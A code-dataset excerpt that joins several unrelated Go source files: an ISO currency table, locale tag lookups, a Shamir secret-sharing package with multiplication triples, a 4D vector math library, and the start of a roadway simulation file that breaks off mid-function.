draw.Draw(dst, b, src, b.Min, draw.Src)
return dst
} | song2.go | 0.532911 | 0.438064 | song2.go | starcoder |
package currency
var (
byNumeric = map[string]*Currency{}
byISO = map[string]*Currency{}
// Testing currency
// For tesing purposes this currency should have 2 decimal digits
// just like other major currencies
xts = Currency{
Numeric: "963",
ISO: "XTS",
Decimals: 2,
Name: "Testing currency",
}
)
func add(c Currency) {
ref := &c
byNumeric[c.Numeric] = ref
byISO[c.ISO] = ref
}
func init() {
Add(
Currency{Numeric: "008", ISO: "ALL", Decimals: 2, Name: "Lek"},
Currency{Numeric: "012", ISO: "DZD", Decimals: 2, Name: "Algerian Dinar"},
Currency{Numeric: "032", ISO: "ARS", Decimals: 2, Name: "Argentine Peso"},
Currency{Numeric: "036", ISO: "AUD", Decimals: 2, Name: "Australian Dollar"},
Currency{Numeric: "044", ISO: "BSD", Decimals: 2, Name: "Bahamian Dollar"},
Currency{Numeric: "048", ISO: "BHD", Decimals: 3, Name: "Bahraini Dinar"},
Currency{Numeric: "050", ISO: "BDT", Decimals: 2, Name: "Taka"},
Currency{Numeric: "051", ISO: "AMD", Decimals: 2, Name: "Armenian Dram"},
Currency{Numeric: "052", ISO: "BBD", Decimals: 2, Name: "Barbados Dollar"},
Currency{Numeric: "060", ISO: "BMD", Decimals: 2, Name: "Bermudian Dollar"},
Currency{Numeric: "064", ISO: "BTN", Decimals: 2, Name: "Ngultrum"},
Currency{Numeric: "068", ISO: "BOB", Decimals: 2, Name: "Boliviano"},
Currency{Numeric: "072", ISO: "BWP", Decimals: 2, Name: "Pula"},
Currency{Numeric: "084", ISO: "BZD", Decimals: 2, Name: "Belize Dollar"},
Currency{Numeric: "090", ISO: "SBD", Decimals: 2, Name: "Solomon Islands Dollar"},
Currency{Numeric: "096", ISO: "BND", Decimals: 2, Name: "Brunei Dollar"},
Currency{Numeric: "104", ISO: "MMK", Decimals: 2, Name: "Kyat"},
Currency{Numeric: "108", ISO: "BIF", Decimals: 0, Name: "Burundi Franc"},
Currency{Numeric: "116", ISO: "KHR", Decimals: 2, Name: "Riel"},
Currency{Numeric: "124", ISO: "CAD", Decimals: 2, Name: "Canadian Dollar"},
Currency{Numeric: "132", ISO: "CVE", Decimals: 2, Name: "<NAME>"},
Currency{Numeric: "136", ISO: "KYD", Decimals: 2, Name: "Cayman Islands Dollar"},
Currency{Numeric: "144", ISO: "LKR", Decimals: 2, Name: "Sri Lanka Rupee"},
Currency{Numeric: "152", ISO: "CLP", Decimals: 0, Name: "Chilean Peso"},
Currency{Numeric: "156", ISO: "CNY", Decimals: 2, Name: "<NAME>"},
Currency{Numeric: "170", ISO: "COP", Decimals: 2, Name: "Colombian Peso"},
Currency{Numeric: "174", ISO: "KMF", Decimals: 0, Name: "Comorian Franc "},
Currency{Numeric: "188", ISO: "CRC", Decimals: 2, Name: "Costa Rican Colon"},
Currency{Numeric: "191", ISO: "HRK", Decimals: 2, Name: "Kuna"},
Currency{Numeric: "192", ISO: "CUP", Decimals: 2, Name: "Cuban Peso"},
Currency{Numeric: "203", ISO: "CZK", Decimals: 2, Name: "Czech Koruna"},
Currency{Numeric: "208", ISO: "DKK", Decimals: 2, Name: "Danish Krone"},
Currency{Numeric: "214", ISO: "DOP", Decimals: 2, Name: "Dominican Peso"},
Currency{Numeric: "222", ISO: "SVC", Decimals: 2, Name: "El Salvador Colon"},
Currency{Numeric: "230", ISO: "ETB", Decimals: 2, Name: "Ethiopian Birr"},
Currency{Numeric: "232", ISO: "ERN", Decimals: 2, Name: "Nakfa"},
Currency{Numeric: "238", ISO: "FKP", Decimals: 2, Name: "Falkland Islands Pound"},
Currency{Numeric: "242", ISO: "FJD", Decimals: 2, Name: "Fiji Dollar"},
Currency{Numeric: "262", ISO: "DJF", Decimals: 0, Name: "Djibouti Franc"},
Currency{Numeric: "270", ISO: "GMD", Decimals: 2, Name: "Dalasi"},
Currency{Numeric: "292", ISO: "GIP", Decimals: 2, Name: "Gibraltar Pound"},
Currency{Numeric: "320", ISO: "GTQ", Decimals: 2, Name: "Quetzal"},
Currency{Numeric: "324", ISO: "GNF", Decimals: 0, Name: "Guinean Franc"},
Currency{Numeric: "328", ISO: "GYD", Decimals: 2, Name: "Guyana Dollar"},
Currency{Numeric: "332", ISO: "HTG", Decimals: 2, Name: "Gourde"},
Currency{Numeric: "340", ISO: "HNL", Decimals: 2, Name: "Lempira"},
Currency{Numeric: "344", ISO: "HKD", Decimals: 2, Name: "Hong Kong Dollar"},
Currency{Numeric: "348", ISO: "HUF", Decimals: 2, Name: "Forint"},
Currency{Numeric: "352", ISO: "ISK", Decimals: 0, Name: "Iceland Krona"},
Currency{Numeric: "356", ISO: "INR", Decimals: 2, Name: "Indian Rupee"},
Currency{Numeric: "360", ISO: "IDR", Decimals: 2, Name: "Rupiah"},
Currency{Numeric: "364", ISO: "IRR", Decimals: 2, Name: "Iranian Rial"},
Currency{Numeric: "368", ISO: "IQD", Decimals: 3, Name: "Iraqi Dinar"},
Currency{Numeric: "376", ISO: "ILS", Decimals: 2, Name: "New Israeli Sheqel"},
Currency{Numeric: "388", ISO: "JMD", Decimals: 2, Name: "Jamaican Dollar"},
Currency{Numeric: "392", ISO: "JPY", Decimals: 0, Name: "Yen"},
Currency{Numeric: "398", ISO: "KZT", Decimals: 2, Name: "Tenge"},
Currency{Numeric: "400", ISO: "JOD", Decimals: 3, Name: "Jordanian Dinar"},
Currency{Numeric: "404", ISO: "KES", Decimals: 2, Name: "Kenyan Shilling"},
Currency{Numeric: "408", ISO: "KPW", Decimals: 2, Name: "North Korean Won"},
Currency{Numeric: "410", ISO: "KRW", Decimals: 0, Name: "Won"},
Currency{Numeric: "414", ISO: "KWD", Decimals: 3, Name: "Kuwaiti Dinar"},
Currency{Numeric: "417", ISO: "KGS", Decimals: 2, Name: "Som"},
Currency{Numeric: "418", ISO: "LAK", Decimals: 2, Name: "Lao Kip"},
Currency{Numeric: "422", ISO: "LBP", Decimals: 2, Name: "Lebanese Pound"},
Currency{Numeric: "426", ISO: "LSL", Decimals: 2, Name: "Loti"},
Currency{Numeric: "430", ISO: "LRD", Decimals: 2, Name: "Liberian Dollar"},
Currency{Numeric: "434", ISO: "LYD", Decimals: 3, Name: "Libyan Dinar"},
Currency{Numeric: "446", ISO: "MOP", Decimals: 2, Name: "Pataca"},
Currency{Numeric: "454", ISO: "MWK", Decimals: 2, Name: "Malawi Kwacha"},
Currency{Numeric: "458", ISO: "MYR", Decimals: 2, Name: "Malaysian Ringgit"},
Currency{Numeric: "462", ISO: "MVR", Decimals: 2, Name: "Rufiyaa"},
Currency{Numeric: "480", ISO: "MUR", Decimals: 2, Name: "Mauritius Rupee"},
Currency{Numeric: "484", ISO: "MXN", Decimals: 2, Name: "Mexican Peso"},
Currency{Numeric: "496", ISO: "MNT", Decimals: 2, Name: "Tugrik"},
Currency{Numeric: "498", ISO: "MDL", Decimals: 2, Name: "Moldovan Leu"},
Currency{Numeric: "504", ISO: "MAD", Decimals: 2, Name: "Moroccan Dirham"},
Currency{Numeric: "512", ISO: "OMR", Decimals: 3, Name: "<NAME>"},
Currency{Numeric: "516", ISO: "NAD", Decimals: 2, Name: "Namibia Dollar"},
Currency{Numeric: "524", ISO: "NPR", Decimals: 2, Name: "Nepalese Rupee"},
Currency{Numeric: "532", ISO: "ANG", Decimals: 2, Name: "Netherlands Antillean Guilder"},
Currency{Numeric: "533", ISO: "AWG", Decimals: 2, Name: "Aruban Florin"},
Currency{Numeric: "548", ISO: "VUV", Decimals: 0, Name: "Vatu"},
Currency{Numeric: "554", ISO: "NZD", Decimals: 2, Name: "New Zealand Dollar"},
Currency{Numeric: "558", ISO: "NIO", Decimals: 2, Name: "Cordoba Oro"},
Currency{Numeric: "566", ISO: "NGN", Decimals: 2, Name: "Naira"},
Currency{Numeric: "578", ISO: "NOK", Decimals: 2, Name: "Norwegian Krone"},
Currency{Numeric: "586", ISO: "PKR", Decimals: 2, Name: "Pakistan Rupee"},
Currency{Numeric: "590", ISO: "PAB", Decimals: 2, Name: "Balboa"},
Currency{Numeric: "598", ISO: "PGK", Decimals: 2, Name: "Kina"},
Currency{Numeric: "600", ISO: "PYG", Decimals: 0, Name: "Guarani"},
Currency{Numeric: "604", ISO: "PEN", Decimals: 2, Name: "Sol"},
Currency{Numeric: "608", ISO: "PHP", Decimals: 2, Name: "Philippine Peso"},
Currency{Numeric: "634", ISO: "QAR", Decimals: 2, Name: "Qatari Rial"},
Currency{Numeric: "643", ISO: "RUB", Decimals: 2, Name: "Russian Ruble"},
Currency{Numeric: "646", ISO: "RWF", Decimals: 0, Name: "Rwanda Franc"},
Currency{Numeric: "654", ISO: "SHP", Decimals: 2, Name: "Saint Helena Pound"},
Currency{Numeric: "682", ISO: "SAR", Decimals: 2, Name: "Saudi Riyal"},
Currency{Numeric: "690", ISO: "SCR", Decimals: 2, Name: "Seychelles Rupee"},
Currency{Numeric: "694", ISO: "SLL", Decimals: 2, Name: "Leone"},
Currency{Numeric: "702", ISO: "SGD", Decimals: 2, Name: "Singapore Dollar"},
Currency{Numeric: "704", ISO: "VND", Decimals: 0, Name: "Dong"},
Currency{Numeric: "706", ISO: "SOS", Decimals: 2, Name: "Somali Shilling"},
Currency{Numeric: "710", ISO: "ZAR", Decimals: 2, Name: "Rand"},
Currency{Numeric: "728", ISO: "SSP", Decimals: 2, Name: "South Sudanese Pound"},
Currency{Numeric: "748", ISO: "SZL", Decimals: 2, Name: "Lilangeni"},
Currency{Numeric: "752", ISO: "SEK", Decimals: 2, Name: "Swedish Krona"},
Currency{Numeric: "756", ISO: "CHF", Decimals: 2, Name: "Swiss Franc"},
Currency{Numeric: "760", ISO: "SYP", Decimals: 2, Name: "Syrian Pound"},
Currency{Numeric: "764", ISO: "THB", Decimals: 2, Name: "Baht"},
Currency{Numeric: "776", ISO: "TOP", Decimals: 2, Name: "Pa’anga"},
Currency{Numeric: "780", ISO: "TTD", Decimals: 2, Name: "Trinidad and Tobago Dollar"},
Currency{Numeric: "784", ISO: "AED", Decimals: 2, Name: "UAE Dirham"},
Currency{Numeric: "788", ISO: "TND", Decimals: 3, Name: "Tunisian Dinar"},
Currency{Numeric: "800", ISO: "UGX", Decimals: 0, Name: "Uganda Shilling"},
Currency{Numeric: "807", ISO: "MKD", Decimals: 2, Name: "Denar"},
Currency{Numeric: "818", ISO: "EGP", Decimals: 2, Name: "Egyptian Pound"},
Currency{Numeric: "826", ISO: "GBP", Decimals: 2, Name: "Pound Sterling"},
Currency{Numeric: "834", ISO: "TZS", Decimals: 2, Name: "Tanzanian Shilling"},
Currency{Numeric: "840", ISO: "USD", Decimals: 2, Name: "US Dollar"},
Currency{Numeric: "858", ISO: "UYU", Decimals: 2, Name: "Peso Uruguayo"},
Currency{Numeric: "860", ISO: "UZS", Decimals: 2, Name: "Uzbekistan Sum"},
Currency{Numeric: "882", ISO: "WST", Decimals: 2, Name: "Tala"},
Currency{Numeric: "886", ISO: "YER", Decimals: 2, Name: "Yemeni Rial"},
Currency{Numeric: "901", ISO: "TWD", Decimals: 2, Name: "New Taiwan Dollar"},
Currency{Numeric: "927", ISO: "UYW", Decimals: 4, Name: "Unidad Previsional"},
Currency{Numeric: "928", ISO: "VES", Decimals: 2, Name: "Bolívar Soberano"},
Currency{Numeric: "929", ISO: "MRU", Decimals: 2, Name: "Ouguiya"},
Currency{Numeric: "930", ISO: "STN", Decimals: 2, Name: "Dobra"},
Currency{Numeric: "931", ISO: "CUC", Decimals: 2, Name: "Peso Convertible"},
Currency{Numeric: "932", ISO: "ZWL", Decimals: 2, Name: "Zimbabwe Dollar"},
Currency{Numeric: "933", ISO: "BYN", Decimals: 2, Name: "Belarusian Ruble"},
Currency{Numeric: "934", ISO: "TMT", Decimals: 2, Name: "Turkmenistan New Manat"},
Currency{Numeric: "936", ISO: "GHS", Decimals: 2, Name: "Ghana Cedi"},
Currency{Numeric: "938", ISO: "SDG", Decimals: 2, Name: "Sudanese Pound"},
Currency{Numeric: "940", ISO: "UYI", Decimals: 0, Name: "Uruguay Peso en Unidades Indexadas (UI)"},
Currency{Numeric: "941", ISO: "RSD", Decimals: 2, Name: "Serbian Dinar"},
Currency{Numeric: "943", ISO: "MZN", Decimals: 2, Name: "Mozambique Metical"},
Currency{Numeric: "944", ISO: "AZN", Decimals: 2, Name: "Azerbaijan Manat"},
Currency{Numeric: "946", ISO: "RON", Decimals: 2, Name: "Romanian Leu"},
Currency{Numeric: "947", ISO: "CHE", Decimals: 2, Name: "WIR Euro"},
Currency{Numeric: "948", ISO: "CHW", Decimals: 2, Name: "WIR Franc"},
Currency{Numeric: "949", ISO: "TRY", Decimals: 2, Name: "Turkish Lira"},
Currency{Numeric: "950", ISO: "XAF", Decimals: 0, Name: "CFA Franc BEAC"},
Currency{Numeric: "951", ISO: "XCD", Decimals: 2, Name: "East Caribbean Dollar"},
Currency{Numeric: "952", ISO: "XOF", Decimals: 0, Name: "CFA Franc BCEAO"},
Currency{Numeric: "953", ISO: "XPF", Decimals: 0, Name: "CFP Franc"},
Currency{Numeric: "967", ISO: "ZMW", Decimals: 2, Name: "Zambian Kwacha"},
Currency{Numeric: "968", ISO: "SRD", Decimals: 2, Name: "Surinam Dollar"},
Currency{Numeric: "969", ISO: "MGA", Decimals: 2, Name: "Malagasy Ariary"},
Currency{Numeric: "970", ISO: "COU", Decimals: 2, Name: "Unidad de Valor Real"},
Currency{Numeric: "971", ISO: "AFN", Decimals: 2, Name: "Afghani"},
Currency{Numeric: "972", ISO: "TJS", Decimals: 2, Name: "Somoni"},
Currency{Numeric: "973", ISO: "AOA", Decimals: 2, Name: "Kwanza"},
Currency{Numeric: "975", ISO: "BGN", Decimals: 2, Name: "Bulgarian Lev"},
Currency{Numeric: "976", ISO: "CDF", Decimals: 2, Name: "Congolese Franc"},
Currency{Numeric: "977", ISO: "BAM", Decimals: 2, Name: "Convertible Mark"},
Currency{Numeric: "978", ISO: "EUR", Decimals: 2, Name: "Euro"},
Currency{Numeric: "979", ISO: "MXV", Decimals: 2, Name: "Mexican Unidad de Inversion (UDI)"},
Currency{Numeric: "980", ISO: "UAH", Decimals: 2, Name: "Hryvnia"},
Currency{Numeric: "981", ISO: "GEL", Decimals: 2, Name: "Lari"},
Currency{Numeric: "984", ISO: "BOV", Decimals: 2, Name: "Mvdol"},
Currency{Numeric: "985", ISO: "PLN", Decimals: 2, Name: "Zloty"},
Currency{Numeric: "986", ISO: "BRL", Decimals: 2, Name: "Brazilian Real"},
Currency{Numeric: "990", ISO: "CLF", Decimals: 4, Name: "Unidad de Fomento"},
// Registering testing currency
xts,
)
} | all.go | 0.591959 | 0.571229 | all.go | starcoder |
package locale
import (
"sort"
)
// A lang id is an identifier of a specific fixed-width string and defines
// a 1-based index into a lookup string. The lookup consists of concatenated
// blocks of size 3, where each block contains a lang string.
type langID uint8
type langLookup string
func (l langLookup) lang(id langID) string {
if id == 0 || 3*int(id) > len(l) {
return ""
}
code := l[int(id-1)*3 : int(id)*3]
end := 3
for end > 0 && code[end-1] == ' ' {
end--
}
return string(code[:end])
}
func (l langLookup) langID(str []byte) langID {
idx := sort.Search(len(l)/3, func(i int) bool {
return l[i*3:(i+1)*3] >= langLookup(str)
})
if idx*3 < len(l) && l.lang(langID(idx+1)) == string(str) {
return langID(idx + 1)
}
return 0
}
// A script id is an identifier of a specific fixed-width string and defines
// a 1-based index into a lookup string. The lookup consists of concatenated
// blocks of size 4, where each block contains a script string.
type scriptID uint8
type scriptLookup string
func (l scriptLookup) script(id scriptID) string {
if id == 0 || 4*int(id) > len(l) {
return ""
}
code := l[int(id-1)*4 : int(id)*4]
end := 4
for end > 0 && code[end-1] == ' ' {
end--
}
return string(code[:end])
}
func (l scriptLookup) scriptID(str []byte) scriptID {
idx := sort.Search(len(l)/4, func(i int) bool {
return l[i*4:(i+1)*4] >= scriptLookup(str)
})
if idx*4 < len(l) && l.script(scriptID(idx+1)) == string(str) {
return scriptID(idx + 1)
}
return 0
}
// A region id is an identifier of a specific fixed-width string and defines
// a 1-based index into a lookup string. The lookup consists of concatenated
// blocks of size 3, where each block contains a region string.
type regionID uint8
type regionLookup string
func (l regionLookup) region(id regionID) string {
if id == 0 || 3*int(id) > len(l) {
return ""
}
code := l[int(id-1)*3 : int(id)*3]
end := 3
for end > 0 && code[end-1] == ' ' {
end--
}
return string(code[:end])
}
func (l regionLookup) regionID(str []byte) regionID {
idx := sort.Search(len(l)/3, func(i int) bool {
return l[i*3:(i+1)*3] >= regionLookup(str)
})
if idx*3 < len(l) && l.region(regionID(idx+1)) == string(str) {
return regionID(idx + 1)
}
return 0
}
// A tag is a tuple consisting of language subtag, the script subtag,
// and the region subtag. The tag lookup is an ordered list of tags and the
// tag id is an 1-based index of this list.
type tag uint32
func (t tag) langID() langID {
return langID((t >> 16) & 0xff)
}
func (t tag) scriptID() scriptID {
return scriptID((t >> 8) & 0xff)
}
func (t tag) regionID() regionID {
return regionID(t & 0xff)
}
type tagID uint16
type tagLookup []tag
func (l tagLookup) tag(id tagID) tag {
if id == 0 || int(id) > len(l) {
return 0
}
return l[id-1]
}
func (l tagLookup) tagID(lang langID, script scriptID, region regionID) tagID {
t := (tag(lang) << 16) | (tag(script) << 8) | tag(region)
idx := sort.Search(len(l), func(i int) bool {
return l[i] >= t
})
if idx < len(l) && l[idx] == t {
return tagID(idx + 1)
}
return 0
}
// A region containment is a tuple consisting of a 2-letter region code and
// a list of region subtag ids. The lookup maps an alphabetic region code (the child)
// to a list of containing regions (the parents). Each entry in the mapping is
// encoded as "RR\xnn\xp1...\xpn", where RR is the child region code, n the number
// of parent subtag ids and p1, ..., pn the parent subtag ids.
type regionContainmentLookup string
func (l regionContainmentLookup) containmentIDs(region []byte, parents []regionID) int {
// The length of parents specifies the number of containment ids per block.
if len(region) != 2 {
return 0
}
blocksize := 2 + 1*len(parents)
idx := sort.Search(len(l)/blocksize, func(i int) bool {
i *= blocksize
return l[i:i+2] >= regionContainmentLookup(region)
})
idx *= blocksize
if idx < len(l) && l[idx:idx+2] == regionContainmentLookup(region) {
for i := 0; i < len(parents); i++ {
start := idx + i
parents[i] = regionID(l[start+2])
if parents[i] == 0 {
return i
}
}
return len(parents)
}
return 0
}
// The parent tag lookup is an ordered list of tag id pairs. Each pair consists
// of a child id and a parent id.
type parentTagLookup []uint32 // tag id => tag id
func (l parentTagLookup) parentID(child tagID) tagID {
idx := sort.Search(len(l), func(i int) bool {
return tagID(l[i]>>16) >= child
})
if idx < len(l) && tagID(l[idx]>>16) == child {
return tagID(l[idx] & 0xffff)
}
return 0
} | internal/locale/tags.go | 0.658857 | 0.403626 | tags.go | starcoder |
package shamir
import (
"errors"
"github.com/superarius/shamir/modular"
)
type Share struct {
X *modular.Int
Y *modular.Int
}
func Shares(threshold, total int, raw []byte) ([]*Share, error) {
if threshold > total {
return nil, errors.New("cannot require more shares then existing")
}
// Convert the secret to modular Int
secret := modular.IntFromBytes(raw)
if !secret.IsModP() {
return nil, errors.New("secret is too large to encrypt")
}
// Create the polynomial of degree (threshold - 1)
polynomial := make([]*modular.Int, threshold)
polynomial[0] = secret
for j := range polynomial[1:] {
r, err := modular.RandInt()
if err != nil {
return nil, err
}
polynomial[j+1] = r
}
// Create the (x, y) points of each share.
result := make([]*Share, total)
for i := range result {
// x-coordinate (taken as Natural Numbers 1,2,3...)
x := modular.NewInt(int64(i+1))
// evaluate the random polynomial at x
result[i] = &Share{
X: x,
Y: EvaluatePolynomial(polynomial, x),
}
}
return result, nil
}
func Reconstruct(shares []*Share, threshold int) (*modular.Int, error) {
if len(shares) < threshold {
return nil, errors.New("not enough shares for interoplation")
}
if len(shares) > threshold {
shares = shares[:threshold]
}
// Use Lagrange Polynomial Interpolation to reconstruct the secret.
secret := InterpolateAtZero(shares)
return secret, nil
}
func (share *Share) Add(shares ...*Share) *Share {
share.X = shares[0].X
share.Y = modular.NewInt(0)
for _, s := range shares {
share.Y.Add(share.Y, s.Y)
}
return share
}
func (share *Share) ScalarMul(x *Share, n *modular.Int) *Share {
share.X = x.X
share.Y = new(modular.Int).Mul(x.Y, n)
return share
}
func (share *Share) ScalarAdd(x *Share, n *modular.Int) *Share {
num := new(modular.Int).Add(x.Y, n)
share.X = x.X
share.Y = num
return share
}
type Triple struct {
A *Share
B *Share
C *Share
}
func TripleShares(t, n int) ([]*Triple, error) {
a, err := modular.RandInt()
if err != nil {
return nil, err
}
b, err := modular.RandInt()
if err != nil {
return nil, err
}
c := new(modular.Int).Mul(a, b)
ashares, err := Shares(t, n, a.Bytes())
if err != nil {
return nil, err
}
bshares, err := Shares(t, n, b.Bytes())
if err != nil {
return nil, err
}
cshares, err := Shares(t, n, c.Bytes())
if err != nil {
return nil, err
}
triples := make([]*Triple, n)
for i := range triples {
triples[i] = &Triple {
A: ashares[i],
B: bshares[i],
C: cshares[i],
}
}
return triples, nil
}
func NewTriples(triples int, t, n int) ([][]*Triple, error) {
i := 0
all := make([][]*Triple, triples)
for i < triples {
ts, err := TripleShares(t, n)
if err != nil {
return nil, err
}
all[i] = ts
i++
}
out := make([][]*Triple, n)
for i := range out {
out[i] = make([]*Triple, triples)
for j, a := range all {
out[i][j] = a[i]
}
}
return out, nil
}
func NewBatchedTriples(ten_ks int, t, n int) ([][][]*Triple, error) {
i := 0
batches := make([][][]*Triple, ten_ks)
for i < ten_ks {
ts, err := NewTriples(10000, t, n)
if err != nil {
return nil, err
}
batches[i] = ts
i++
}
return batches, nil
}
func PrepareMul(x, y *Share, triple *Triple) (*Share, *Share) {
neg1 := modular.NewInt(-1)
negA := new(Share).ScalarMul(triple.A, neg1)
negB := new(Share).ScalarMul(triple.B, neg1)
xas := new(Share).Add(x, negA)
ybs := new(Share).Add(y, negB)
return xas, ybs
}
func FinishMul(x_a []*Share, y_b []*Share, x, y *Share, triple *Triple) (*Share, error) {
epsilon, err := Reconstruct(x_a, len(x_a))
if err != nil {
return nil, err
}
rho, err := Reconstruct(y_b, len(y_b))
if err != nil {
return nil, err
}
ner := new(modular.Int).Mul(epsilon, rho)
ner.Mul(ner, modular.NewInt(-1))
term1 := new(Share).ScalarMul(y, epsilon)
term2 := new(Share).ScalarMul(x, rho)
t3 := new(Share).Add(term1, term2, triple.C)
out := new(Share).ScalarAdd(t3, ner)
return out, nil
} | shamir.go | 0.707809 | 0.414543 | shamir.go | starcoder |
package vmath
import (
"fmt"
"github.com/maja42/vmath/math32"
)
type Vec4f [4]float32
func (v Vec4f) String() string {
return fmt.Sprintf("Vec4f[%f x %f x %f x %f]", v[0], v[1], v[2], v[3])
}
// Format the vector to a string.
func (v Vec4f) Format(format string) string {
return fmt.Sprintf(format, v[0], v[1], v[2], v[3])
}
// Vec4i returns an integer representation of the vector.
// Decimals are truncated.
func (v Vec4f) Vec4i() Vec4i {
return Vec4i{int(v[0]), int(v[1]), int(v[2]), int(v[3])}
}
// Round returns an integer representation of the vector.
// Decimals are rounded.
func (v Vec4f) Round() Vec4i {
return Vec4i{
int(math32.Round(v[0])),
int(math32.Round(v[1])),
int(math32.Round(v[2])),
int(math32.Round(v[3]))}
}
// Split returns the vector's components.
func (v Vec4f) Split() (x, y, z, w float32) {
return v[0], v[1], v[2], v[3]
}
// X returns the vector's first component.
// Performance is equivalent to using v[0].
func (v Vec4f) X() float32 {
return v[0]
}
// Y returns the vector's second component.
// Performance is equivalent to using v[1].
func (v Vec4f) Y() float32 {
return v[1]
}
// Z returns the vector's third component.
// Performance is equivalent to using v[2].
func (v Vec4f) Z() float32 {
return v[2]
}
// W returns the vector's fourth component.
// Performance is equivalent to using v[3].
func (v Vec4f) W() float32 {
return v[3]
}
// XY returns a 2D vector with the X and Y components.
func (v Vec4f) XY() Vec2f {
return Vec2f{v[0], v[1]}
}
// XYZ returns a 3D vector with the X, Y and Z components.
func (v Vec4f) XYZ() Vec3f {
return Vec3f{v[0], v[1], v[2]}
}
// Abs returns a vector with the components turned into absolute values.
func (v Vec4f) Abs() Vec4f {
return Vec4f{math32.Abs(v[0]), math32.Abs(v[1]), math32.Abs(v[2]), math32.Abs(v[3])}
}
// Add performs component-wise addition.
func (v Vec4f) Add(other Vec4f) Vec4f {
return Vec4f{v[0] + other[0], v[1] + other[1], v[2] + other[2], v[3] + other[3]}
}
// AddScalar performs a component-wise scalar addition.
func (v Vec4f) AddScalar(s float32) Vec4f {
return Vec4f{v[0] + s, v[1] + s, v[2] + s, v[3] + s}
}
// Sub performs component-wise subtraction.
func (v Vec4f) Sub(other Vec4f) Vec4f {
return Vec4f{v[0] - other[0], v[1] - other[1], v[2] - other[2], v[3] - other[3]}
}
// SubScalar performs a component-wise scalar subtraction.
func (v Vec4f) SubScalar(s float32) Vec4f {
return Vec4f{v[0] - s, v[1] - s, v[2] - s, v[3] - s}
}
// Mul performs a component-wise multiplication.
func (v Vec4f) Mul(other Vec4f) Vec4f {
return Vec4f{v[0] * other[0], v[1] * other[1], v[2] * other[2], v[3] * other[3]}
}
// MulScalar performs a scalar multiplication.
func (v Vec4f) MulScalar(s float32) Vec4f {
return Vec4f{v[0] * s, v[1] * s, v[2] * s, v[3] * s}
}
// Div performs a component-wise division.
func (v Vec4f) Div(other Vec4f) Vec4f {
return Vec4f{v[0] / other[0], v[1] / other[1], v[2] / other[2], v[3] / other[3]}
}
// DivScalar performs a scalar division.
func (v Vec4f) DivScalar(s float32) Vec4f {
return Vec4f{v[0] / s, v[1] / s, v[2] / s, v[3] / s}
}
// Normalize the vector. Its length will be 1 afterwards.
// If the vector's length is zero, a zero vector will be returned.
func (v Vec4f) Normalize() Vec4f {
length := v.Length()
if Equalf(length, 0) {
return Vec4f{}
}
return Vec4f{v[0] / length, v[1] / length, v[2] / length, v[3] / length}
}
// Length returns the vector's length.
func (v Vec4f) Length() float32 {
return math32.Sqrt(v[0]*v[0] + v[1]*v[1] + v[2]*v[2] + v[3]*v[3])
}
// SquareLength returns the vector's squared length.
func (v Vec4f) SquareLength() float32 {
return v[0]*v[0] + v[1]*v[1] + v[2]*v[2] + v[3]*v[3]
}
// IsZero returns true if all components are zero.
// Uses the default Epsilon as relative tolerance.
func (v Vec4f) IsZero() bool {
return v.EqualEps(Vec4f{}, Epsilon)
}
// Equal compares two vectors component-wise.
// Uses the default Epsilon as relative tolerance.
func (v Vec4f) Equal(other Vec4f) bool {
return v.EqualEps(other, Epsilon)
}
// EqualEps compares two vectors component-wise, using the given epsilon as a relative tolerance.
func (v Vec4f) EqualEps(other Vec4f, epsilon float32) bool {
return EqualEps(v[0], other[0], epsilon) &&
EqualEps(v[1], other[1], epsilon) &&
EqualEps(v[2], other[2], epsilon) &&
EqualEps(v[3], other[3], epsilon)
}
// Clamp clamps each component to the range of [min, max].
func (v Vec4f) Clamp(min, max float32) Vec4f {
return Vec4f{
Clampf(v[0], min, max),
Clampf(v[1], min, max),
Clampf(v[2], min, max),
Clampf(v[3], min, max),
}
}
// Negate inverts all components.
func (v Vec4f) Negate() Vec4f {
return Vec4f{-v[0], -v[1], -v[2], -v[3]}
}
// Dot performs a dot product with another vector.
func (v Vec4f) Dot(other Vec4f) float32 {
return v[0]*other[0] + v[1]*other[1] + v[2]*other[2] + v[3]*other[3]
}
// Project returns a vector representing the projection of vector v onto "other".
func (v Vec4f) Project(other Vec4f) Vec4f {
return other.MulScalar(v.Dot(other) / other.SquareLength())
}
// Lerp performs a linear interpolation between two vectors.
// The parameter t should be in range [0, 1].
func (v Vec4f) Lerp(other Vec4f, t float32) Vec4f {
return other.Sub(v).MulScalar(t).Add(v)
}
// Distance returns the euclidean distance to another position.
func (v Vec4f) Distance(other Vec4f) float32 {
return other.Sub(v).Length()
}
// SquareDistance returns the squared euclidean distance to another position.
func (v Vec4f) SquareDistance(other Vec4f) float32 {
return other.Sub(v).SquareLength()
} | vec4f.go | 0.92607 | 0.656497 | vec4f.go | starcoder |
package roadway
import (
"fmt"
"go-experiments/common/commonio"
"go-experiments/common/commonmath"
"go-experiments/voxelli/config"
"go-experiments/voxelli/geometry"
"math"
"strconv"
"strings"
"github.com/go-gl/mathgl/mgl32"
)
// Defines the road types that exist in our file.
type RoadType int
// Ordering is important! Road types are parsed according to these constant values.
const (
NotARoadType RoadType = iota
StraightRoadType
CurvedRoadType
MaxRoadType
)
// Defines a generic road element
type Road interface {
// Returns true if the position is in-bounds on the road.
// position: Normalized from (0, 0) to GetRoadBounds(), guaranteed to be within the road piece
InBounds(position mgl32.Vec2) bool
// Gets the bounds of the road piece.
GetBounds(gridPos commonMath.IntVec2) []geometry.Intersectable
}
func newRoad(roadType RoadType, optionalData int) Road {
switch roadType {
case StraightRoadType:
return StraightRoad{rotated: optionalData != 0}
case CurvedRoadType:
return CurvedRoad{rotation: optionalData}
case NotARoadType:
return OutOfBoundsRoad{}
default:
return OutOfBoundsRoad{}
}
}
func getOffsetPosition(position mgl32.Vec2) mgl32.Vec2 {
return position.Add(mgl32.Vec2{float32(GetGridSize() / 2), float32(GetGridSize() / 2)})
}
func getGridIdx(position mgl32.Vec2) commonMath.IntVec2 {
return commonMath.IntVec2{
int(position.X() / float32(GetGridSize())),
int(position.Y() / float32(GetGridSize()))}
}
func getGridRelativePos(gridIdx commonMath.IntVec2, position mgl32.Vec2) mgl32.Vec2 {
return position.Sub(mgl32.Vec2{float32(gridIdx.X() * GetGridSize()), float32(gridIdx.Y() * GetGridSize())})
}
func getRealPosition(position mgl32.Vec2) mgl32.Vec2 {
return position.Sub(mgl32.Vec2{float32(GetGridSize() / 2), float32(GetGridSize() / 2)})
}
// Defines a 2D roadway with road elements
type Roadway struct {
roadElements [][]Road
roadParts []geometry.Intersectable
}
func (r *Roadway) InBounds(position mgl32.Vec2) bool {
offsetPos := getOffsetPosition(position)
// Outside of the entire road grid
